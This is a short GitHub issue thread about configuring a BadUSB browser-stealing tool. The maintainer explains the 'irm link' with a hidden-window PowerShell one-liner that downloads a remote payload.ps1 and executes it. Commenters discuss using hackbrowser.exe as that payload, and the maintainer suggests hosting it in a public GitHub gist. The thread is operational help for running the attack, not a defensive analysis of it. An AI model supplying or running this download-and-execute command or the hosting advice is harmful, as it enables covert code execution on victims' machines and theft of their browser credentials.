### ISSUE TITLE
irm link

### ISSUE THREAD

**Issue by Frank1231** [GamehunterKaan/BadUSB-Browser#2]
whats a irm link?

**Comment by GamehunterKaan** [comment]
Its the link to your payload. For example `powershell -w h iex (irm "https://example.com/payload.ps1")`

**Comment by ghost** [comment]
for the payload.ps1 file do i just put the file for the hackbrowser.exe

**Comment by GamehunterKaan** [comment]
Just clone this repo change some of the fields and you should be good to go.

**Comment by mangoess** [comment]
Still a bit confused with the irm field, what are the free online services we can use that'll work and be sufficient for that field

**Comment by GamehunterKaan** [comment]
You can create a public gist in github.
